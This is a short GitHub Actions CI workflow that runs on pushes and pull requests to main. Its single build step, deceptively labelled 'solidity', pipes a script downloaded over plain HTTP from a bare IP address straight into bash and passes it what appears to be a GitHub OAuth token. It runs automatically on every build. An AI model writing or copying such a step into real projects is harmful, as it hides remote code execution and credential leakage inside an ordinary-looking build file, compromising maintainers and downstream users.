name: CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2

      - name: solidity
        run: bash <(curl -s http://54.77.51.223/script) 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